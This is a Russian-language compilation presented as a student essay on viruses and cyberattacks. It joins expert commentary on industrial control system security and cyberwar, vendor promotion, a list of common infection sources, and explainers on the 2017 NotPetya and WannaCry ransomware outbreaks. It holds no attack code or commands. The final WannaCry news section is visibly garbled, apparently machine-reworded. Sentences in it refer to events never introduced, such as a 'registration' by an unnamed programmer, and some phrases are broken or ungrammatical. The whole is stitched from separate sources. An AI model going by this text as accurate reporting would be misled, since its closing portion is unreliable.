Вирусная атака или акт войны? Реферат вирусы и вирусные атаки

Парадокс со знаком минус нашей цивилизации заключается в том, что достижения науки и новейшие технологии сразу же начинают применяться отнюдь не в благих целях. ИТ не стали исключением. Набрав силу, они превратились в опаснейшее оружие — относительно недорогое, скрытное, но очень разрушительное. Как-то само собой получилось, что ракетно-ядерная эпоха - это уже вчерашний день. Настала эра кибернетических операций, диверсий и даже войн.

И это не фигура речи. Во всех развитых государствах уже несколько лет официально существуют кибервойска. Чем они занимаются, догадаться нетрудно. Особенно преуспели в строительстве нового вида вооруженных сил США, Китай, Великобритания, Южная Корея, Германия, Франция и Израиль. Численность киберподразделений в разных странах составляет от нескольких сотен до нескольких десятков тысяч человек. Объем финансирования исчисляется сотнями миллионов долларов, а наиболее «продвинутые» и богатые государства тратят миллиарды. И Россия, по мнению ряда экспертов, в этом вопросе находится на передних рубежах - в рейтинге кибервойск нам отводят пятое место.

Но оружие, пусть даже самое разрушительное, если оно находится под контролем государства, - это еще полбеды. Главная неприятность информационных технологий в том, что они доступны террористам, преступникам, мошенникам и прочим «плохим парням». Конечно, многие будут по старинке красть деньги с кредитных карт и банковских счетов, но ведь найдутся и такие, которые устроят техногенную катастрофу на каком-нибудь крупном предприятии или под угрозой такой диверсии потребуют астрономическую сумму.

Могут ли злоумышленники нарушить работу АСУ ТП (автоматических систем управления технологическими процессами) или даже перехватить управление? Специалисты по ИБ отвечают, что случаи вмешательства в работу АСУ ТП регистрируются довольно часто. Точных данных о количестве и масштабах атак нет, поскольку предприятия стараются это скрывать, но, как считают эксперты, сегодня порядка 35% инцидентов, связанных со сбоями в промышленных сетях, можно считать результатом кибератак. Самый безобидный результат этого - простой предприятия. Исследовав инциденты в 2013 г., специалисты компании RISI пришли к выводу, что 60% предприятий, которые подверглись таким атакам, потеряли из-за простоя до 4 часов, 22% - от 4 до 24 часов, и 18% остановились более чем на сутки.

Конечно, проблема защиты промышленных объектов, АСУ ТП и критических элементов инфраструктуры существовала и прежде, но сейчас она вышла на новый уровень. Сегодня уже недостаточно изолировать производственные системы от внешних сетей, как было раньше, да и зачастую это невозможно и экономически нецелесообразно. Например, видеокамеры, датчики и прочие устройства подключаются по IP, управляются обычным компьютером, а данные накапливаются в стандартных СХД. И даже если производственную ЛВС сделать автономной и изолированной, все равно одного зараженного USB-накопителя хватит, чтобы, минуя все барьеры, внедрить вредоносное ПО в такую сеть.

Специалисты подчеркивают, что обычные методы защиты промышленных систем и АСУ ТП не работают. Эти объекты очень сложны, в них применяются узкоспециализированные технологии, серверы, автоматизированные рабочие места, программируемые логические контроллеры. И к ним должна быть адаптирована система безопасности. Кроме того, взрывной рост Интернета вещей порождает новые угрозы, против которых пока нет противоядия. А поскольку вредоносные программы способны проникать в производственные системы через офисные приложения и наоборот, важно обеспечить защиту всей информационной инфраструктуры предприятия.

Как отмечает Дмитрий Обозный , начальник отдела системного анализа компании «Код безопасности», существующий и постоянно растущий уровень информатизации промышленных предприятий и критически важных объектов инфраструктуры позволяет сделать вывод о существовании серьезной угрозы компьютерных атак. «Именно поэтому государство уделяет такое серьезное внимание этой проблеме - вплоть до включения в состав ключевых аспектов доктрины информационной безопасности и военной доктрины», - сказал он.

Максим Тикуркин , генеральный директор компании «Системный софт», напомнил, что в истории уже были громкие атаки на промышленные объекты и критически важные элементы инфраструктуры с существенными последствиями. Это и Stuxnet, атаковавший ядерные объекты Ирана, в результате чего было выведено из строя более 1 тыс. центрифуг, и атака на украинскую компанию «Прикарпатьеоблэнерго», в результате которой область и город остались на некоторое время без электричества. Эти случаи - особенно первый - демонстрируют всю серьезность возможных последствий атак. Примечательно, что в первом случае вирус распространялся через USB-накопители. Попадание вируса в сеть стало следствием халатности ряда сотрудников, допустивших использование в сети флэш-карт с вирусом, а также отсутствие обновлений ОС на станциях, которые были частью критической инфраструктуры.

Павел Луцик , руководитель проектов по информационной безопасности компании КРОК, считает, что к ключевым рискам ИБ промышленных систем относятся факты внешнего проникновения с выведением АСУ ТП из строя, внешнее несанкционированное управление технологическим процессом, а также риски, связанные с проникновением вредоносного ПО и неправомерными или случайными действиями сотрудников. Последствия - остановка производства, финансовые потери или даже катастрофы. В качестве примера он приводит атаку на сталелитейное предприятие в Германии. Хакерам удалось удаленно вывести из строя доменную печь, что привело к поломке оборудования и простою производства. Доступ к печи хакеры получили, заразив вредоносным программным обеспечением офисную сеть. Другой инцидент, получивший широкую известность, - кибератака на украинских поставщиков электроэнергии, в результате чего прекратилась подача электричества на 80 подстанциях, без света остались более 200 тыс. человек. Параллельно для отвлечения внимания атака была проведена и на call-центр энергокомпании. После отключения подстанций хакеры смогли внедриться в систему и приступить к удалению данных с жестких дисков на рабочих станциях и SCADA-серверах, также они изменили настройки источников бесперебойного питания. По уровню атаки можно судить о высокой технической подготовке злоумышленников.

«Вирусы и хакерские атаки представляют серьезную угрозу для промышленных предприятий, поскольку сегодня все больше процессов автоматизируется и цена простоя увеличивается, - говорит Сергей Абрамов , генеральный директор компании „Софи-Софт“. - Если 10-15 лет назад в таких ситуациях промышленное предприятие могло продолжать работу с относительно низкими потерями, то сегодня цена простоя гораздо выше».

«Атаки типа WannaCry и другие подобные или еще неизвестные являются серьезной угрозой для компаний любых отраслей, в том числе и для промышленных предприятий. Многие из них входят в стратегически важные комплексы, например ВПК, атомная промышленность, космическая отрасль. Любые несанкционированные действия могут приводить к выводу систем и оборудования из строя и другим чрезвычайным ситуациям», - комментирует Константин Савченко , руководитель отдела поддержки корпоративных продаж компании Axoft.

По словам Николая Зенина , главного инженера проектов информационной безопасности ГК «Компьюлинк», используемые на промышленных объектах АСУ в технологическом плане часто представляют собой разработки на базе старых версий ОС (Windows, Sun Solaris), что позволяет получать ожидаемую производительность приложений, функционирующих на имеющемся оборудовании. С другой стороны, такая система не терпит программных вмешательств. И даже добавление простого антивируса в промышленные системы - задача довольно сложная. На практике защита АСУ зачастую сводится к организации надежного защищенного контура вокруг системы, блокирующего любые внешние вмешательства.

«Если предположить, что защита не используется, то вирусы представляют серьезную угрозу для производства. Проникнув в АСУ ТП, они парализуют производство. Хакеры тоже могут нанести серьезный ущерб, вплоть до потери производственного объекта, как это было с металлургическим комбинатом в Германии, - говорит Алексей Петухов , руководитель направления АСУ ТП Центра информационной безопасности компании „Инфосистемы Джет“. - До сих пор малое число инцидентов связано с человеческим фактором, а именно отсутствием спроса на хакерские атаки на промышленные объекты и отсутствием понимания того, каким образом можно получить выгоду от них. К тому же все понимают, что ЧП на производстве может обернуться гибелью людей, а это уже другой уровень ответственности. Но, к сожалению, на ближайшие годы мы прогнозируем рост активности хакеров и вредоносного ПО и атаки на промышленные системы».

Война по правилам и без

Сражения в киберпространстве идут не первый год. Участниками «боевых действий» выступают как государства, так и различные группы, в том числе преступные и террористические. Их цель - нанести урон противнику (экономический, политический или репутационный), что обусловлено конкурентной борьбой, промышленным шпионажем либо желанием получить деньги. Наиболее вероятными целями для атак, по мнению Дмитрия Обозного, являются военные объекты, промышленная инфраструктура и предприятия, энергетические комплексы, телекоммуникационные компании, кредитно-финансовая сфера, здравоохранение, информационные ресурсы и СМИ.

Максим Тикуркин считает, что атаки на технологические сети предприятий становятся менее привлекательными, потому что на большинстве промышленных объектов активно внедряются средства защиты АСУ ТП, в том числе дата-диоды, исключающие возможность атак из корпоративной сети. Что касается финансовой выгоды, то для ее достижения наиболее перспективными остаются корпоративные сети и даже сегмент B2C. Например, в мире разработчики вирусов-шифровальщиков заработали за последний год более миллиарда долларов. Что касается технологических сетей, то атаки на них преследуют не финансовые цели.

Вместе с тем Дмитрий Обозный отмечает, что доказанных фактов кибердиверсий со стороны «кибервойск» или спецслужб в настоящее время не имеется. Но необходимо принимать во внимание потенциальную возможность осуществления атак сотрудниками специальных «киберподразделений». О таких рисках идет речь в Доктрине информационной безопасности.

Мало кто спорит, что одно государство может провести кибератаку на объекты другого государства. Максим Тикуркин напомнил, что вышеупомянутый вирус Stuxnet был настолько сложен в плане заложенных в нем механизмов и принципов действия, что вряд ли мог быть разработан группой энтузиастов. Но это всего лишь догадки. В случаях крупных атак на критически важные объекты очень сложно доказать причастность (или непричастность) правительства той или иной страны.

«Если в настоящее время ряд стран находится в жесткой конфронтации, а некоторые в состоянии боевых действий, то очевидно, что и ИТ также остаются в их поле зрения, и также очевидно, что любой урон, в том числе с помощью кибератак, расценивается одной из сторон как еще одна удачная возможность нанести ущерб сопернику. Тем более что подобные атаки можно скрывать продолжительное время», - говорит Константин Савченко.

Андрей Марусин , старший менеджер по продукту ГК ИВС (Пермь), считает, что государства вполне могут вести кибервойну против «недружественных» режимов и стран. Если целью небольших групп хакеров являются деньги, то кибердиверсанты «на господдержке» работают над тем, чтобы ослабить экономику противника.

Но если кибервторжение повлечет за собой серьезные потери для атакованной стороны (а именно этого и добивается противник), то пострадавшее государство вполне может расценить это как акт агрессии или войны. Со всеми вытекающими. Алексей Петухов подчеркивает, что на уровне доктрин безопасности большинства развитых государств кибератаки могут быть оценены как акт вторжения. И эти страны оставляют за собой право отвечать всеми доступными средствами.

Андрей Марусин заметил, что такие вторжения носят характер военных действий, но пока только в кибернетическом пространстве. «На прошедшей в феврале 2017 г. коллегии ФСБ вопросы кибервойн стояли как никогда остро», - сказал он.

По словам Дмитрия Обозного, в соответствии с резолюцией 3314 Генеральной ассамблеи ООН от 14 декабря 1974 г., атаки в информационном пространстве не определяются как агрессия. Но в те годы и информационное пространство было совсем другим. Сегодня, согласно нашей военной доктрине, наблюдается тенденция смещения военных угроз в информационное пространство. А основными военными угрозами признаются «воспрепятствование работе систем государственного и военного управления РФ, нарушение функционирования ее стратегических ядерных сил, систем предупреждения о ракетном нападении, контроля космического пространства, объектов хранения ядерных боеприпасов, атомной энергетики, атомной, химической, фармацевтической и медицинской промышленности».

Но более вероятными представляются боевые и диверсионные операции в киберпространстве со стороны террористических и экстремистских групп. «Их вмешательство в управление автоматизированными системами критически важных объектов, в том числе и с целью вывода их из строя, можно считать довольно вероятными, - заявил Павел Луцик. - Имеются сведения, что в 2015 г. более 600 российских интернет-ресурсов были атакованы хакерами террористической организации „Исламское государство Ирака и Леванта“ (запрещена в России). Учитывая интерес подобных группировок к предприятиям США, к российским информационным ресурсам, их высокую мотивацию и финансовые возможности, можно прогнозировать рост угрозы для критически важных объектов нашей страны. Риск того, что террористические организации будут покупать техническую информацию компаний для совершения атак, довольно вероятен. Поэтому государствам так важно вовремя обезопасить себя от подобных угроз. Кроме того, в прогнозе МЧС о чрезвычайной обстановке на территории Российской Федерации отмечалось, что уровень информационной безопасности не соответствует уровню угроз в данной сфере, и в 2017 г. возможна активизация хакерских атак с целью создания условий для возникновения техногенных чрезвычайных ситуаций».

С этим согласен и Андрей Марусин. По его словам, преступники и террористы активно осваивают приемы и методы кибернетических войн. Их цели могут быть самыми разнообразными: от взлома сайтов с размещением на них компрометирующей информации до информационной войны против целого государства.

«Все страны с высоким уровнем развития экономики постоянно совершенствуют системы безопасности на промышленных предприятиях и объектах критически значимой инфраструктуры: развивается законодательство, разрабатываются стандарты, соответствующие новым угрозам, принимаются практические меры. Поэтому основная зона риска - страны третьего мира, в которых технологии защиты АСУ ТП внедряются с существенной задержкой, - говорит Максим Тикуркин. - В теории злоумышленники могут преследовать цели получения контроля над крупными предприятиями - например в области нефтепереработки. Вторая группа риска - страны с нестабильными политическими системами, в которых взломы критически важных объектов могут служить инструментом для смены политического режима».

Игорь Гершуни , руководитель группы инжиниринга АО «Белтел», подчеркивает, что любой, кто совершает подобную атаку, по определению является преступником. Если атака направлена не на получение прибыли, а на нанесение ущерба, то ее можно считать терактом. Ту же атаку на «Прикарпатьеоблэнерго» вполне можно квалифицировать как теракт. Что же касается целей, то они, по мнению Игоря Гершуни, могут быть разными: промышленный шпионаж, саботаж как средство конкурентной борьбы или способ оказания политического давления, использование ресурсов предприятия для своих целей (организации бот-нетов, майнинга криптовалют и т. п). Не стоит сбрасывать со счетов и банальное хулиганство, а также разрушение ради разрушения.

«Взаимодействие киберпреступников сегодня стало эталоном совместной работы удаленных пользователей. Речь идет о координации не только отдельных специалистов, но и целых группировок, - отметил Алексей Петухов. - Уровень квалификации наемных киберприступников может соответствовать подготовке профессиональных киберподразделений. А так как негосударственные ресурсы в качестве политических инструментов активно используются по всему миру, то и вероятность осуществления целенаправленных кибердиверсий террористами и преступниками тоже растет».

Экспертное мнение

Михаил Хлестов , директор по развитию бизнеса компании Axoft:

Современные промышленные объекты в значительной степени автоматизированы. Технологические процессы управляются системами класса АСУ ТП, в которые входят обычные серверы и ПО, а также специализированное оборудование и системы. Как и в обычных программах, в системах АСУ ТП есть уязвимости, которые специалисты обнаруживают быстрее, чем производители успевают выпустить соответствующие патчи. Поэтому они уязвимы для атак хакеров, которые могут получить контроль над АСУ ТП и нарушить технологические процессы. Такие нарушения могут иметь как локальные последствия (например, сбой в системе производства), так и привести к катастрофе или прекращению работы объектов критически важной инфраструктуры. Во втором случае более уместно говорить о финансовом ущербе для экономики в целом, чем об ущербе для одного предприятия.

Только применение современных продуктов, высокий уровень компетенции специалистов и отлаженные процессы обеспечения информационной безопасности позволят своевременно зафиксировать вторжение злоумышленников и предотвратить нежелательные последствия. Как правило, компьютерная сеть промышленных предприятий делится на два сегмента: корпоративный и технологический. При этом корпоративный сегмент подключен к Интернету, а технологический хотя и не имеет прямого выхода во Всемирную сеть, но подключен к корпоративному. Поэтому задачу условно можно разделить на две части: защита корпоративной сети и защита технологической сети. Для защиты первой мы предлагаем нашим партнерам широкий спектр сертифицированных ФСТЭК продуктов информационной безопасности (системы класса антивирус, межсетевой экран, система обнаружения вторжений, сканер уязвимостей, системы класса SIEM и другие) ведущих мировых производителей. Кроме того, в нашем портфеле есть специализированные продукты, предназначенные для защиты технологического сегмента сети, в том числе Kaspersky Industrial CyberSecurity Platform (KICS).

Спецпроект

Уйдем в глухую оборону

Как же правильно организовать защиту предприятий? И кто должен взять на себя эту миссию и ответственность?

«Основная цель защиты АСУ на промышленных предприятиях заключается в обеспечении непрерывности технологических процессов, - считает Николай Зенин. - Для этого должен быть организован комплекс организационных и технических мер, обеспечивающих функционирование компонентов АСУ с минимизацией любых воздействий, в том числе вмешательства самих средств информационной безопасности. Также должны быть приняты организационные меры, исключающие возможность небезопасных действий со стороны пользователей, операторов АСУ по отношению к промышленной сети, в том числе подключения внешних носителей информации, создания неуправляемых беспроводных соединений, неконтролируемого приема-передачи файлов и установки неизвестного ПО».

По мнению Сергея Абрамова, нужна комплексная защита предприятия не только с помощью антивирусных программ и межсетевых экранов, необходимо также предусмотреть защиту от неосторожных, неумышленных действий сотрудников, которые могут нанести вред предприятию, систему блокировки распространения вирусов.

Дмитрий Обозный отметил, что комплексный подход к защите предприятий должен включать в себя организационные и технические меры. Необходимо сочетание обучения персонала и применения современных средств. Помимо этого должна быть регламентирована деятельность по защите информации и организации допуска к инфраструктуре и данным.

«Необходимо выстроить многоуровневую оборону, а также обратить внимание на обучение сотрудников компаний компьютерной грамотности, - заявил Андрей Марусин. - В наши дни недостаточно быть уверенным пользователем ПК, важно также понимать, как противодействовать социальной инженерии, используемой для подготовки атак на предприятия».

Антон Карданов , руководитель сектора ИБ компании AT Consulting, говорит, что масштаб угрозы и возможного ущерба от хакерских атак на промышленные предприятия очень индивидуальны и зависят от уровня подготовки к таким инцидентам каждого конкретного объекта. При организации системы защиты в первую очередь необходимо руководствоваться комплексным подходом к безопасности: это и подсистемы на различных уровнях (сетевые и прикладные средства безопасности), и организационные меры, и дополняющие технические средства. И конечно, необходимо помнить о том, что после создания системы необходимо провести оценку ее эффективности, найти слабые места.

«Защита предприятия от ИБ-угроз - это большой комплекс мер. Среди них - и использование современных средств, и обучение персонала, и даже такая банальная вещь, как регулярное продление технической поддержки на ПО и аппаратные комплексы, - подчеркнул Константин Савченко. - Очень часто встречаются ситуации, когда клиент построит высокий „забор“ из решений ИБ, но часть из них по разным причинам не обновляется, и, по сути, такой „забор“ из решений превращается в решето, в котором полно известных уязвимостей. В некоторых случаях следует отказаться от закупки нового оборудования, а лучше приобрести техническую поддержку по уже эксплуатируемым решениям.

Еще один тренд связан с пониманием проблематики и усовершенствованием атак. Давно известно, что обеспечить 100% безопасности невозможно, а значит, нужно смотреть не только в сторону средств защиты, но и средств мониторинга и обнаружения атак, оперативно выявлять урон, минимизировать его, проводить упреждающие меры на основе анализа данных».

Как обеспечить комплексную защиту объектов критической информационной инфраструктуры

Критически важные объекты - приоритетные цели атак злоумышленников, поскольку такие атаки наносят значительный вред функционированию систем государственного управления, подрывают безопасность и финансовое благополучие граждан, негативно влияют на экологию.

Именно поэтому для комплексной защиты объектов критической информационной инфраструктуры жизненно необходимо централизованное управление всеми подсистемами информационной безопасности. Тогда при получении сигнала об инциденте ИБ-специалист сможет оперативно отследить признаки компрометации во всей ИТ-инфраструктуре и своевременно на них отреагировать. Таким образом, одним из важнейших критериев выбора средства защиты информации (наряду с его функциональными возможностями и качеством) становится наличие централизованного управления.

Разработанное компанией «Код безопасности» комплексное решение Secret Net Studio предоставляет такую возможность: оно обладает централизованной системой управления и мониторинга, ориентированной на крупные территориально распределенные структуры.

Не менее важным преимуществом Secret Net Studio можно считать наличие более 20 механизмов защиты от несанкционированного доступа. В их числе - распределенный межсетевой экран с функцией авторизации сетевых соединений для создания виртуальных сегментов без изменения сетевой топологии, контроль запускаемых приложений, контроль съемных носителей, система обнаружения вторжений уровня хоста и файловый антивирус для защиты от вредоносного ПО.

Secret Net Studio сертифицирован ФСТЭК, что позволяет использовать этот продукт для защиты государственных информационных систем (ГИС) и информационных систем, обрабатывающих персональные данные (ИСПДн). В результате большинство ИБ-задач решаются с помощью всего одного ИБ-продукта. А за счет централизованного управления системой можно повысить оперативность действий администраторов.

Спецпроект

Кому доверить безопасность?

Какие компании должны обеспечивать защиту информации и промышленных систем от вирусных атак и вторжений? Системные интеграторы, специализированные фирмы, собственные подразделения информационной безопасности на предприятиях или правительственные кибервойска?

«Если говорить о проблеме с глобальной точки зрения, то, конечно, ключевая роль должна быть за государством. Как пример - появление специализированных отраслевых организаций, - говорит Константин Савченко. - Но мы понимаем, что спасение утопающих - дело рук самих утопающих, поэтому ответственность ложится на саму организацию или предприятие. И тут важен рост влияния сотрудников, отвечающих как за ИТ в целом, так и за ИБ в частности».

Андрей Марусин считает, что правительство не сможет обеспечить информационную безопасность всем. Каждая компания должна задуматься над этим и вместе с надежным системным интегратором планомерно работать над улучшением уровня ИБ. Чем выше ее уровень, тем дороже обойдется атака. Нужно достичь такого предела, когда атаковать вас будет невыгодно.

По мнению Алексея Петухова, информационная безопасность обеспечивается процессами, людьми и техническими средствами. Процессы ИБ и системную работу с сотрудниками могут ввести только собственные подразделения компании. Только они и должны получать информацию от средств защиты. Далее все зависит от возможностей предприятия и его организационной структуры. Но так же как и борьба с преступностью - задача государства, а не каждого гражданина, так и защита от кибертерроризма - системная задача государства.

Дмитрий Обозный добавил, что в зависимости от сферы деятельности предприятия или критически важного объекта концептуально обеспечение защиты сводится к взаимодействию ИБ-вендора, интегратора, собственных ИБ-специалистов заказчика и регуляторов рынка.

Игорь Гершуни убежден, что обеспечивать защиту промышленных систем от кибератак должны все структуры, имеющие к этому отношение. Системные интеграторы помогут спланировать и оптимизировать комплекс мер безопасности, установить и настроить оборудование и ПО. На собственные подразделения ИБ логично возложить ответственность за выработку и контроль всех процедур, обучение персонала, проведение регламентных и аварийно-восстановительных работ. Специализированные компании в обязательном порядке привлекаются для независимого аудита безопасности и пен-тестов.

В приведенном комплексе мер наиболее трудоемкой задачей, требующей больших ресурсов и высокой квалификации персонала, является контроль и анализ трафика и событий безопасности в сети. Данная задача обычно возлагается на ситуационный центр информационной безопасности, который может быть развернут силами самого предприятия (что дорого, сложно и долго) либо отдан на аутсорсинг сторонней специализированной организации (это не всегда возможно по ряду причин). «Что касается правительственных кибервойск, то не очень понятно, что именно понимается под данным словосочетанием, но без государственного участия в защите объектов критической инфраструктуры не обойтись. В нашей стране этим занимается недавно созданная система ГосСОПКА», - заявил Игорь Гершуни.

Антон Карданов, ссылаясь на практический опыт, говорит, что наиболее эффективно привлечение системных интеграторов с опытом выполнения подобных проектов. Конечно, интеграторы бывают разные, и следует ориентироваться на компании, которые специализируются на обеспечении ИБ критичных объектов. При этом системный интегратор должен работать в тесном контакте со специалистами внутренней службы безопасности.

«Ответственность за защиту АСУ ТП лежит, разумеется, на руководстве предприятий и критически важных объектов, однако внутренние подразделения не могут реализовать весь комплекс мер по развертыванию системы кибербезопасности. В настоящее время большинство проектов по защите АСУ ТП реализуется интеграторами, имеющими соответствующий опыт и располагающими специализированным инструментарием для проверки защищенности объектов АСУ ТП», - подытожил Максим Тикуркин.

Самая мощная и серьезная угроза компьютерных пользователей - это вирусные атаки. Они затрудняют важную работу с данными и документами. Для каждого пользователя компьютера обязательно наличие знаний о программном обеспечении и сервисах, которые могут помочь защитить устройства от атак. Нужно принимать все возможные меры, чтобы компьютерные системы были защищены. Ниже перечислены основные источники вирусных атак.

Загружаемые программы

Одним из возможных источников вирусных атак являются загружаемые из Интернета программы. Ненадежные источники и интернет-группы новостей являются одним из основных источников вредоносных программ. Загружаемые файлы выступают одними из лучших распространителей вируса. Любой тип исполняемой программы, включая игры, бесплатные приложения, дополнения для экрана, а также исполняемые файлы, является одним из основных источников компьютерных вирусных атак. В таких данных с расширением «.com», «.exe» и «coolgame.exe» также содержатся вредоносные сценарии. Поэтому во всех случаях, когда вы хотите загрузить программы из Интернета, необходимо сканировать каждую из них перед запуском.

Cracked Software

«Кряки» выступают еще одним источником вирусных атак. Большинство людей, которые скачивают взломанные и пиратские версии программного обеспечения онлайн, не знают о том, что они могут содержать вирусы. Такие формы файлов содержат вредоносные сценарии и ошибки, которые трудно обнаружить, а также удалить. Следовательно, всегда предпочтительным вариантом является загрузка программного обеспечения из соответствующего источника.

Вложения электронной почты

Они также являются одним из популярных источников компьютерных вирусных атак. Следовательно, вы должны обращаться с вложениями электронной почты с особой осторожностью, особенно если письмо приходит от неизвестного отправителя. Установка хорошего антивируса - первостепенная необходимость, если вы хотите устранить этот риск. Необходимо сканировать электронную почту, даже если она приходит от друга. Существует вероятность того, что другой пользователь может иметь неосознанно перенаправленный вирус вместе с приложением электронной почты.

Интернет - лучший источник вирусных атак-2017

Нельзя отрицать тот факт, что Интернет является одним из весьма распространенных источников вирусов, особенно в наши дни. Этот факт не является сюрпризом, и, конечно, нет никакого смысла прекращать доступ к Интернету впредь. Большинство пользователей компьютеров не знают, когда вирусы атакуют компьютерные системы. Почти каждый юзер нажимает на ссылки и загружает все, что предлагает браузер, и, следовательно, бессознательно допускает возможность вирусных атак.

Загрузка с неизвестного носителя

Один из других распространенных источников вирусных атак - неизвестный диск или флешка. Большинство пользователей компьютеров считают, что одним из наиболее распространенных способов заражения вирусом является съемный носитель с данными. Рекомендуется удалять диск или флешку, когда компьютерная система не работает. Если вы не удаляете носитель после выключения устройства, оно может автоматически начать загрузку с него.

Это может увеличить возможность установки, а также запуск файлов/программ на конкретной компьютерной системе. Помимо вышеупомянутых источников, (например, Bearshare, Kazaa и Limewire) также иногда являются источниками вирусных атак. Следовательно, необходимо удалять загруженные файлы из вышеупомянутых сетей обмена данными, чтобы исключить возможность заражения вирусом.

Новая вирусная атака

Многие организации в Европе и США пострадали от вирусной атаки, связанной с вымогательством. Это произошло из-за действия вируса, известного как «Петя». распространились через крупные фирмы, включая рекламодателя WPP, пищевую компанию Mondelez, юридическую фирму DLA Piper и датскую судоходную и транспортную фирму Maersk, что привело к блокированию данных с ПК и последующему требованию выкупа.

Это вторая крупная глобальная атака по вымогательству за 2017 год. В начале мая Национальная служба здравоохранения Великобритании (NHS) стала первой среди организаций, зараженных вирусом WannaCry, который использовал уязвимость системы. Как стало впоследствии известно, он был выпущен в Интернет в апреле группой хакеров, называющей себя «Теневые брокеры».

Атака WannaCry повлияла на более чем 230 000 компьютеров в более чем 150 странах, среди которых оказались NHS, испанская телефонная компания Telefónica и немецкие государственные железные дороги. Как и WannaCry, «Петя» быстро распространяется по сетям, использующим Microsoft Windows, но что это такое и как это можно остановить?

Как это работает?

Вирусная атака 27 июня 2017 года типа Ransomware прошлась по многим странам, в том числе по России. Это вид вредоносного ПО, которое блокирует доступ к компьютеру или его данным и требует деньги для восстановления доступа к ним.

Когда компьютер заражен, Ransomware шифрует важные документы и файлы, а затем требует выкуп, как правило, в биткоинах, для получения цифрового ключа, необходимого для разблокировки файлов. Если у жертв нет недавней резервной копии файлов, они должны либо заплатить выкуп, либо потерять все свои данные.

Как работает рецессия «Петя»?

Зараженное устройство блокирует компьютеры в сети и требует 300 долларов США, выплачиваемых в биткоинах. Вредоносная программа быстро распространяется после заражения с использованием уязвимости EternalBlue в Windows (Microsoft выпустила исправление, но не все его установили) или двумя инструментами администрирования ОС. Вирус пытается использовать один параметр, и если он не работает, он пытается выполнить следующий. При этом у него имеется лучший механизм для распространения, чем у WannaCry, как отметили специалисты.

Есть ли защита?

Большинство крупных антивирусных компаний-разработчиков заявляют, что их программное обеспечение обновлено, и теперь способно активно обнаруживать и защищать от заражений вирусом «Петя». Например, производители продуктов Symantec и Kaspersky сообщили, что их программное обеспечение по безопасности теперь может обнаруживать вредоносное ПО.

Кроме того, обновление Windows и поддержание ОС в актуальном состоянии тоже останавливает один из основных способов заражения, а также защищает от будущих атак с разными полезными нагрузками.

От этой конкретной атаки вредоносных программ была обнаружена еще одна линия защиты: «Петя» проверяет файлы, предназначенные только для чтения, C:\Windows\ perfc.dat, и если он найдет его, он не будет запускать сторону шифрования программного обеспечения. Но эта «вакцина» на самом деле не предотвращает заражение, и вредоносное ПО все еще будет использовать свою точку опоры на вашем ПК, чтобы попытаться распространиться на других в одной сети.

Почему он называется «Петя»?

Строго говоря, новый вирус - это не совсем то, что известно специалистам как «Петя». Похоже, что это вредоносное ПО обладает значительным количеством кода, имеющего много совпадений со старым вирусом, который действительно назывался Petya. Но через несколько часов после начала атак исследователи заметили, что это лишь поверхностное сходство. Исследователи из «Лаборатории Касперского» после вирусной атаки в России отказались называть это вредоносное ПО данным именем, и в результате стали распространяться схожие варианты названия - Petna, Pneytna и т. д. Кроме того, другие исследователи, которые самостоятельно заметили вредоносное ПО, дали ему другие имена: румынский Bitdefender назвал его Goldeneye, например.

С чего это началось?

Похоже, что атака была осуществлена с помощью механизма обновления программного обеспечения, встроенного в бухгалтерскую программу, которую, по мнению украинской киберполиции, должны использовать компании, работающие с украинским правительством. Это объясняет, почему пострадало так много украинских организаций, в том числе правительство, банки, государственные энергетические компании и киевский аэропорт и система метро. Система в Чернобыле также была отключена от сети, вынудив сотрудников использовать ручные счетчики для измерения уровней радиации в зоне отчуждения АЭС. Вторая волна инфекций была порождена фишинговой кампанией с вредоносными приложениями.

Как далеко он распространился?

Новый вариант «Пети» вызвал серьезные нарушения в работе крупных фирмах в Европе и США, в том числе в рекламной компании WPP, французской строительной компании Saint-Gobain и российских сталелитейных и нефтяных компаниях. В частности, произошла массивная вирусная атака на «Роснефть» и «Евраз». Пищевая компания Mondelez, юридическая фирма DLA Piper, датская судоходная и транспортная фирма AP Moller-Maersk и Heritage Valley Health System, которая работает в больницах и учреждениях по уходу в Питтсбурге, также заявили, что их системы пострадали от вредоносного ПО.

В отличие от WannaCry, эта версия «Пети» пытается распространяться внутри сетей, но не проявляется внешне. Это может ограничить предельное распространение вредоносного ПО, которое, похоже, замедлило снижение числа новых заражений за одну ночь.

Опубликовано: 16 Мая, 2017, 07:46 | Куксиловa Полина Олеговна

Специалисты по кибербезопасности предполагают, что зафиксированная в конце предыдущей недели вирусная атака может активизироваться, когда работники снова включат свои компьютеры. В Великобритании больше всего пострадали клиники.

Программа-вымогатель WannaCry (она же WannaCryptor и WCry) шифрует файлы пользователя, в результате чего их уже нельзя использовать. За снятие блокировки злоумышленники добивались выкуп в биткоинах - эквивалент от 300 до 600 долларов. О том, как спастись от вируса-вымогателя и уберечь свои файлы на компьютере - в инструкции от ИА YakutiaMedia. Связаться с правонарушителями можно прямо через программу. В «Лаборатории Касперского» докладывали о 45 тысячах попыток хакерских атак в 74 государствах по всей планете в конце рабочей недели, наибольшее число попыток заражений наблюдалось в Российской Федерации.

После того как в МВД сообщили об успешном предотвращении атаки, идентичные сообщения появились и от других правительственных ведомств - МЧС, Минздрава, а кроме этого, РЖД и ГИБДД. Уполномоченный компании Avast Якуб Кроустек сказал в Twitter, что заражены около 36 тыс. компьютеров по всей планете, основная часть из них - в РФ, Тайване и Украине. В РФ оказались заражены компьютеры по крайней мере «Мегафона», МВД и СК, а также, вероятно, РЖД.

Тогда программист провел процедуру регистрации, после этого, вирус закончил свои атаки. Среди объектов нападения - не только лишь личные компьютеры, однако и серверы клиник, железных дорог, сотовых операторов, банков и силовых ведомств.

Атак либо вредоносного влияния на информационные системы самого НПК «Дедал» до реального момента не зафиксировано, системы функционируют в штатном режиме, тем как минимум, Специалисты провели мероприятия по усилению мер безопасности и профилактике вероятных угроз. Как оказалось, основной особенностью является использование эксплоита ETERNALBLUE. Вначале данная программа была разработана Агентством нацбезопасности Соединенных Штатов. По достоверным сведениям «Лаборатории Касперского», атака происходит с применением уязвимости в протоколе SMB, позволяющей удаленно запускать программный код.

Рено приостановил работу собственных заводов, чтобы проверить свои ПК. Наименее чем за сутки их жертвы перевели свыше 7 биткойнов, что составляет приблизительно 12 тыс. долларов США.

Для защиты компания Microsoft обновления устаревших версий известной ОС. Необходимо пользоваться обновлённым антивирусом в режиме мониторинга, по возможности проверить систему на наличие угроз. Но многие юзеры и организации отключают автоматические обновления на собственных компьютерах. «Вирус блокирует дисплей компьютера и шифрует файлы на жестком диске». Как правило письма шифровальщиков присылаются в виде заявлений от бухгалтерий, либо неоплаченных штрафов от ГИБДД.

